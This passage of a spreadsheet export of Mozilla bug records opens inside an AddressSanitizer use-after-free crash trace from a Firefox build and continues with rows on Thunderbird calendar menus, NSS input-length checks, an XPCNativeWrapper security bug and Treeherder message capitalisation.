    #44 0x7f818068a3d3 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4168
    #45 0x7f818039c02c in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #46 0x7f81803a430a in DoTick /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1483:5
    #47 0x7f81803a430a in DoRefresh /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2257
    #48 0x7f81803a430a in nsRefreshDriver::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2175
    #49 0x7f818039ad66 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1798:7
    #50 0x7f81803a3a52 in DoTick /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1483:5
    #51 0x7f81803a3a52 in DoRefresh /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2257
    #52 0x7f81803a3a52 in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2108
    #53 0x7f817bb012a7 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:463:5
    #54 0x7f817bbf879c in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&amp;, unsigned long const&amp;, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:550:5
    #55 0x7f817ad2849d in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1390:20
    #56 0x7f817a6bd455 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1743:14
    #57 0x7f817a6b9c9c in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1681:17
    #58 0x7f817a6bbd74 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1572:5
    #59 0x7f817a6bc42e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1597:5
    #60 0x7f817988a7bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #61 0x7f817990c8fc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #62 0x7f817a6c557f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #63 0x7f817a6370d8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #64 0x7f817a6370d8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #65 0x7f817a6370d8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #66 0x7f817fccffff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #67 0x7f8181d4dd31 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #68 0x7f8181ee5047 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #69 0x7f8181ee67bd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #70 0x7f8181ee767c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #71 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #72 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #73 0x7f81952d682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #74 0x41ba88 in _start (/fuzzer3/esr/firefox/firefox+0x41ba88)
0x625000a46120 is located 32 bytes inside of 8192-byte region [0x625000a46100,0x625000a48100)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f81928b4117 in FreeArenaList /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:195:9
    #2 0x7f81928b4117 in PL_FinishArenaPool /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:222
    #3 0x7f81803927ff in nsPresArena::~nsPresArena() /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:56:3
    #4 0x7f818066aa70 in nsIPresShell::~nsIPresShell() /home/worker/workspace/build/src/layout/base/nsIPresShell.h:181:7
    #5 0x7f818066abbd in PresShell::~PresShell() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:841:1
    #6 0x7f8180667453 in PresShell::Release() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:835:1
    #7 0x7f818016868f in ~nsCOMPtr_base /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:294:7
    #8 0x7f818016868f in nsComputedDOMStyle::GetStyleContextForElement(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:426
    #9 0x7f81801676d1 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:705:7
    #10 0x7f81801680eb in nsComputedDOMStyle::GetPropertyCSSValue(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:796:3
    #11 0x7f8180166386 in nsComputedDOMStyle::GetPropertyValue(nsAString_internal const&amp;, nsAString_internal&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:379:26
    #12 0x7f81801661a8 in nsComputedDOMStyle::GetPropertyValue(nsCSSPropertyID, nsAString_internal&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:317:10
    #13 0x7f817ca51ee9 in GetWidth /home/worker/workspace/build/src/layout/style/nsCSSPropList.h:4392:1
    #14 0x7f817ca51ee9 in mozilla::dom::CSS2PropertiesBinding::get_width(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMCSSDeclaration*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:42528
    #15 0x7f817e017f80 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2824:13
    #16 0x7f81843a2de5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #17 0x7f81843a2de5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #18 0x7f81843a3a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #19 0x7f8183e748ed in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #20 0x7f817af79022 in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3330:12
    #21 0x7f817af79022 in xpc::XrayWrapper&lt;js::CrossCompartmentWrapper, xpc::DOMXrayTraits&gt;::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/xpconnect/wrappers/XrayWrapper.cpp:2247
    #22 0x7f81840eceee in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:309:12
    #23 0x7f81840ed28c in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1522:16
    #24 0x7f81840ed28c in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:305
    #25 0x7f81843af0e1 in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1522:16
    #26 0x7f81843af0e1 in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:846
    #27 0x7f81843af0e1 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4263
    #28 0x7f818438769c in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #29 0x7f818438769c in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2639
    #30 0x7f81843683ad in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #31 0x7f81843a344f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #32 0x7f81843a3a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #33 0x7f8183e72682 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #34 0x7f817f8949bb in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3310:14
    #35 0x7f817f8949bb in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
    #36 0x7f817f85e56e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:634:5
    #37 0x7f817f85e36e in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:419:7
    #38 0x7f81806e1003 in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
    #39 0x7f81806e1003 in XBLConstructorRunner::Run() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1687
    #40 0x7f817c0e24ae in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5195:5
previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7f81928b3a24 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
    #2 0x7f8180393041 in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7f818075c6ef in AllocateByFrameID /home/worker/workspace/build/src/layout/base/nsPresArena.h:52:12
    #4 0x7f818075c6ef in AllocateFrame /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:229
    #5 0x7f818075c6ef in operator new /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:312
    #6 0x7f818075c6ef in NS_NewBlockFrame(nsIPresShell*, nsStyleContext*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:300
    #7 0x7f81804aaff3 in nsCSSFrameConstructor::ConstructNonScrollableBlockWithConstructor(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&amp;, nsBlockFrame* (*)(nsIPresShell*, nsStyleContext*)) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4955:32
    #8 0x7f81804b47e7 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4921:10
    #9 0x7f81804ae532 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:3845:7
    #10 0x7f81804bb7e6 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6196:3
    #11 0x7f8180497f14 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10640:5
    #12 0x7f8180497f14 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10852
    #13 0x7f81804a27fd in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11862:3
    #14 0x7f81804ab4f2 in nsCSSFrameConstructor::ConstructNonScrollableBlockWithConstructor(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&amp;, nsBlockFrame* (*)(nsIPresShell*, nsStyleContext*)) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4957:3
    #15 0x7f81804b47e7 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4921:10
    #16 0x7f81804ae532 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:3845:7
    #17 0x7f81804bb7e6 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6196:3
    #18 0x7f8180497f14 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10640:5
    #19 0x7f8180497f14 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10852
    #20 0x7f81804a27fd in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11862:3
    #21 0x7f818049ec58 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2625:5
    #22 0x7f81804c1ec6 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7753:7
    #23 0x7f8180670fc8 in PresShell::Initialize(int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1790:7
    #24 0x7f81805d8a43 in nsDocumentViewer::InitPresentationStuff(bool) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:723:5
    #25 0x7f81805eb4f6 in nsDocumentViewer::Show() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2147:12
    #26 0x7f8181375989 in SetVisibility /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6486:5
    #27 0x7f8181375989 in non-virtual thunk to nsDocShell::SetVisibility(bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6476
    #28 0x7f817c57bf0a in nsFrameLoader::Show(int, int, int, int, nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:864:3
    #29 0x7f8180983205 in nsSubDocumentFrame::ShowViewer() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:188:9
    #30 0x7f8180a01682 in AsyncFrameInit::Run() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:90:7
    #31 0x7f817c0e24ae in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5195:5
    #32 0x7f818068a3d3 in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2865:5
    #33 0x7f818068a3d3 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4168
    #34 0x7f818039c02c in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #35 0x7f81803a430a in DoTick /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1483:5
    #36 0x7f81803a430a in DoRefresh /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2257
    #37 0x7f81803a430a in nsRefreshDriver::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2175
    #38 0x7f818039ad66 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1798:7
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/generic/nsIFrame.h:1125:12 in GetUsedBorderAndPadding
Shadow bytes around the buggy address:
  0x0c4a80140bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80140be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80140bf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80140c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a80140c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c4a80140c20: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80140c30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80140c40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80140c50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80140c60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80140c7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9825==ABORTING</t>
        </is>
      </c>
      <c r="X6153" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6154">
      <c r="A6154" t="n">
        <v>456385</v>
      </c>
      <c r="B6154" t="inlineStr">
        <is>
          <t>2008-09-22 08:14:50 -0700</t>
        </is>
      </c>
      <c r="C6154" t="inlineStr">
        <is>
          <t>Thunderbird3: Integrate Calendar and Task mode menu items into new menu</t>
        </is>
      </c>
      <c r="D6154" t="inlineStr">
        <is>
          <t>2010-02-04 11:05:24 -0800</t>
        </is>
      </c>
      <c r="E6154" t="n">
        <v>1</v>
      </c>
      <c r="F6154" t="n">
        <v>1</v>
      </c>
      <c r="G6154" t="n">
        <v>2</v>
      </c>
      <c r="H6154" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6154" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J6154" t="inlineStr">
        <is>
          <t>Calendar Frontend</t>
        </is>
      </c>
      <c r="K6154" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6154" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6154" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6154" t="inlineStr">
        <is>
          <t>[needed beta][has l10n impact]</t>
        </is>
      </c>
      <c r="Q6154" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6154" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6154" t="inlineStr">
        <is>
          <t>1.0b1</t>
        </is>
      </c>
      <c r="T6154" t="n">
        <v>1</v>
      </c>
      <c r="U6154" t="n">
        <v>1</v>
      </c>
      <c r="V6154" t="n">
        <v>27</v>
      </c>
      <c r="W6154" t="inlineStr">
        <is>
          <t>The following items need to be integrated, or removed for an integration into the new menu structure [1]
* New Calendar
* Import Calendar
* Export Calendar
* Show Work Days Only
* Show Tasks in Calendar
* Show Completed Tasks
* Rotate View -&gt; we don't want to have this in tb3, right? ;-)
* View Day
* View Week
* View Multi Week
* View Month
* View Minimonth
* View Calendars
* View Invitations
* Go Today
* Reload Calendar
* Publish
* Delete Calendar
* Find Calendar
* Filter Tasks
* Mark Completed
* Progress
* Calendar
* Convert to
[1] https://wiki.mozilla.org/Thunderbird:Menus</t>
        </is>
      </c>
      <c r="X6154" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6155">
      <c r="A6155" t="n">
        <v>1539788</v>
      </c>
      <c r="B6155" t="inlineStr">
        <is>
          <t>2019-03-28 06:13:16 -0700</t>
        </is>
      </c>
      <c r="C6155" t="inlineStr">
        <is>
          <t>Check length of inputs for cryptographic primitives</t>
        </is>
      </c>
      <c r="D6155" t="inlineStr">
        <is>
          <t>2020-10-21 13:52:26 -0700</t>
        </is>
      </c>
      <c r="E6155" t="n">
        <v>1</v>
      </c>
      <c r="F6155" t="n">
        <v>1</v>
      </c>
      <c r="G6155" t="n">
        <v>3</v>
      </c>
      <c r="H6155" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6155" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6155" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6155" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L6155" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6155" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6155" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6155" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6155" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main70+][adv-main70+r]</t>
        </is>
      </c>
      <c r="Q6155" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6155" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6155" t="inlineStr">
        <is>
          <t>3.46</t>
        </is>
      </c>
      <c r="T6155" t="n">
        <v>1</v>
      </c>
      <c r="U6155" t="n">
        <v>0</v>
      </c>
      <c r="V6155" t="n">
        <v>33</v>
      </c>
      <c r="W6155" t="inlineStr">
        <is>
          <t>Benjamin Beurdouche pointed out that not a lot of cryptographic primitives check the length of their inputs.  After looking at some of our code, we don't do that for ChaCha20Poly1305.  It probably makes sense to do a bit of an audit.
Generally speaking, the limits for primitives are significantly higher than a sensible input would allow for, so this isn't a serious concern.  However, having the checks is good hygiene.</t>
        </is>
      </c>
      <c r="X6155" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6156">
      <c r="A6156" t="n">
        <v>444075</v>
      </c>
      <c r="B6156" t="inlineStr">
        <is>
          <t>2008-07-08 03:17:26 -0700</t>
        </is>
      </c>
      <c r="C6156" t="inlineStr">
        <is>
          <t>XPCNativeWrapper pollution using chrome XBL</t>
        </is>
      </c>
      <c r="D6156" t="inlineStr">
        <is>
          <t>2009-02-05 22:33:09 -0800</t>
        </is>
      </c>
      <c r="E6156" t="n">
        <v>1</v>
      </c>
      <c r="F6156" t="n">
        <v>1</v>
      </c>
      <c r="G6156" t="n">
        <v>3</v>
      </c>
      <c r="H6156" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6156" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6156" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K6156" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6156" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6156" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6156" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6156" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6156" t="inlineStr">
        <is>
          <t>[sg:critical] fixed by 441087</t>
        </is>
      </c>
      <c r="Q6156" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6156" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6156" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6156" t="n">
        <v>1</v>
      </c>
      <c r="U6156" t="n">
        <v>0</v>
      </c>
      <c r="V6156" t="n">
        <v>10</v>
      </c>
      <c r="W6156" t="inlineStr">
        <is>
          <t>It's possible to modify an implicit XPCNativeWrapper within a chrome XBL method
without using eval-like methods nor __defineGetter__.  (See also the second
paragraph of bug 387390 comment #21.)</t>
        </is>
      </c>
      <c r="X6156" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6157">
      <c r="A6157" t="n">
        <v>1150938</v>
      </c>
      <c r="B6157" t="inlineStr">
        <is>
          <t>2015-04-03 09:50:37 -0700</t>
        </is>
      </c>
      <c r="C6157" t="inlineStr">
        <is>
          <t>Capitalize all thNotify.send() messages</t>
        </is>
      </c>
      <c r="D6157" t="inlineStr">
        <is>
          <t>2015-05-20 04:33:57 -0700</t>
        </is>
      </c>
      <c r="E6157" t="n">
        <v>1</v>
      </c>
      <c r="F6157" t="n">
        <v>1</v>
      </c>
      <c r="G6157" t="n">
        <v>7</v>
      </c>
      <c r="H6157" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6157" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6157" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6157" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6157" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6157" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6157" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6157" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6157" t="inlineStr">
        <is>
          <t>[good first bug][lang=js]</t>
        </is>
      </c>
      <c r="Q6157" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R6157" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S6157" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6157" t="n">
        <v>1</v>
      </c>
      <c r="U6157" t="n">
        <v>0</v>
      </c>
      <c r="V6157" t="n">
        <v>6</v>
      </c>
      <c r="W6157" t="inlineStr">
        <is>
          <t>Per one of Ed's review comments in PR449, we'd like to capitalize all thNotify.send() messages, as some are not, for example in the pinboard and pinboard services. 
